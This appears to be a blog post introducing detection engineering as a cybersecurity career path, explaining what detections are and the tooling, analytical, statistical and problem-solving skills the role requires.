Detection Engineering
Detection Engineering as a discipline has gotten a lot of traction in recent times.
What used to be part of the job for an Incident responder, DART (Detection and Response) member, or Threat Researcher is now a full blown career path on its own. As the complexity and frequency of cyber threats increase, so does the demand for specialized roles to combat these threats.
Detection Engineering plays a crucial role in identifying and later preventing security breaches in organizations.
But what exactly is this discipline and what skills does it require to succeed in this subfield of Cybersecurity?
Below is a general outline of what to look for.
In a nutshell, a detection is some kind of logic that results in an actionable finding that allows analysts or engineers to respond to said finding. This could be any of the following: KQL, SPL, Sigma rules, JSON, YAML, YARA, custom Python, and more.
A later post will be dedicated to the intricacies of detections and alerts.
For now, we can leave it as each detection being composed of logic; a crafted piece of code, designed to detect specific patterns or anomalies that might indicate a security threat.
To become a Detection Engineer in the cybersecurity industry, you need to possess several essential skills.
The Essential Toolkit
Deep Understanding of Your Tools
These skills include a strong foundation in network security technologies, protocols, scripting, and tools which could include Intrusion Detection Systems (IDS), Endpoint Detection and Response (EDR), and Security Information and Event Management (SIEM). This is because the data from these tools will be used to then form the detection logic.
You should have a deep understanding of common attack methods, threat actors, and security best practices to detect and prevent security breaches.
Analytical
In addition, you need to be familiar with the techniques and methods used by attackers to gain unauthorized access to computer systems, networks, or data. Analytical skills are critical to analyzing large volumes of data and identifying potential threats, patterns, and suspicious activities.
Stats
Quantifying and measuring the effectiveness of your detection logic using statistical data related to events and alerts is also important. Being able to also tell a story through statistical data can be huge when it comes to management and other stakeholders.
Problem Solving Skills
Problem-solving skills are essential for identifying and solving complex problems quickly and making decisions under pressure. For example, needing to come up with a detection or alert for a new internal threat, or finding the root cause of a broken detection and implementing the fix.
Finally, Detection Engineers must be proactive in seeking out new information and resources to improve their skills and knowledge as the world of cybersecurity is constantly evolving.
There are many posts that have talked about this very topic. From defining the concept of Detection Engineering, to lifecycles of how to implement it.
Check out the following.
Understanding these skills will equip you with the tools needed to succeed in Detection Engineering.
I hope this helps you understand another domain within the umbrella that is Cybersecurity.
Is there place for detection engineering only in information seciruty companies or should any company be looking into this as well?